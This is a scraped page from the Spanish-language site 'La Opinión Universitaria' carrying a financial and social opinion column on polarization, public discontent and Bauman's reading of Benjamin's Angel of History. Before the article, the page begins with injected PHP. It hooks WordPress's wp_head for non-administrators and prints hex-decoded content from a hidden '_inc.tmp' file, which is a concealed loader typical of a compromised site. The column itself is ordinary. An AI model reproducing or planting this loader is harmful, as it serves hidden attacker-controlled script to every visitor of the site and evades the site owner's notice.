if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } MI OPINION FINANCIERA DE HOY     – La Opinión Universitaria La Opinión Universitaria
Menu

MI OPINION FINANCIERA DE HOY    

 

ARMANDO VALERDI

avalerdir@hotmail.com

Para las condiciones de nuestro entorno actual en el que domina la aceleración y velocidad del cambio, con una creciente complejidad e incertidumbre, es muy importante tener presente que para realizar nuestra planeación, no solo financiera sino de vida, es necesario entender que el futuro no está escrito en ninguna parte, y que sabemos que el futuro es la razón del presente, por lo que el reto es identificar las señales de futuro que están incrustadas en el presente para que así podamos crear los escenarios que nos orienten a construir el futuro que deseamos. Para lo que es necesario visualizar en primer término nuestro entorno actual, analizar la historia de dónde venimos y realizar la prospectiva hacia donde queremos llegar.

Ya en el comentario anterior, mencione acerca de la polarización que existe en la sociedad mundial y que pone en aprietos a todo gobierno en turno, debido a que la velocidad del cambio abre brechas cada vez más grandes que dificultan la gobernabilidad, sobre todo si los políticos no están entendiendo tanto el ritmo como los rezagos que a la velocidad enorme siguen aumentando la brecha de la desigualdad que se refleja en muchos aspectos de la economía mundial, y sobre todo en el modo de vida de la población.

¿A qué me refiero?, en que hoy se presentan diferentes aspectos en la vida de la población, que la siguen afectando, y a los que no se ve con claridad las propuestas de parte de los gobiernos que lleven a su atajo y mejoría.

Con base en una publicación reciente del Fondo Monetario Internacional (FMI), podemos confirmar cuales son las causas de molestia, insatisfacción y enojo de la población, entre muchas podemos encontrar, el desempleo, las condiciones de inseguridad en el trabajo, bajos salarios, la falta de una adecuada planeación y atención a la salud, el uso de trabajo infantil o forzado cada vez en aumento, el Impacto ambiental en áreas protegidas, y muchos más están afectando el bienestar y la esperanza de la sociedad.

En esta parte hay que contemplar la opinión de Zygmunt Bauman, que nos narra acerca de la tesis de Walter Benjamin, escrita en los años cuarenta y en donde envía un mensaje representado por el “Ángel Novus”, que el llamo el Ángel de la Historia, en donde el rostro del Ángel esta vuelto hacia el pasado, y en donde el pasaje del pasado está lleno de escombros, de catástrofes, y en donde al Ángel le gustaría quedarse ayudar a levantar ese catástrofe del pasado, pero los vientos huracanados lo llevan a un futuro que promete un horizonte con un paraíso, llenos de esperanza para la humanidad.

Para Bauman el Ángel de la historia ha dado un giro de ciento ochenta grados, y la maniobra de cambio ahora, es que el Ángel vuelve su rostro a un pasado nostálgico, romántico e idealizado, porque la esperanza de un futuro que se le ofrecía a la humanidad no fue tal, el futuro muestra un infierno complejo e incierto. Y en donde Bauman menciona a Svetlana Boym, y su tesis de la epidemia de nostalgia de la sociedad global actual, acerca del pasado idealizado en su mente y que percibe mejor que el presente y futuro que hoy le ofrece la realidad.

Svetlana, nos advierte que “la epidemia de nostalgia, es un sentimiento de pérdida y desplazamiento, pero también un idilio romántico con nuestra propia fantasía personal”, “el peligro de la nostalgia radica en que se tiende a confundir el hogar real y el imaginario”.

Bauman advierte, que existe una pista donde buscar y encontrar tales peligros: concretamente en cierta nostalgia restauradora, “que es precisamente una característica de los renaceres nacionales y nacionalistas en todo el mundo, empeñados en fabricar mitos antimodernos de la historia a través de la vuelta a los símbolos y la mitología nacionales y, a veces también, de la reutilización de las teorías de la conspiración”.

Como podemos ver, y si además analizamos como hemos llegado hasta aquí, y la marginación hecha por la forma de implementar la globalización, encontramos las heridas que una gran población tiene y en donde culpa a una modernidad de los errores y abusos de quienes han tenido y tienen el poder.

Lo más preocupante y peligroso que veo es que detener el avance del cambio creara muchas tensiones sociales, pero también si el cambio se sigue sin un diagnóstico adecuado en su implementación será la catástrofe que el Ángel Novus o el Ángel de la Historia percibe,

Gracias

 

 

 

 

No comments

Deja una respuesta

Tweets recientes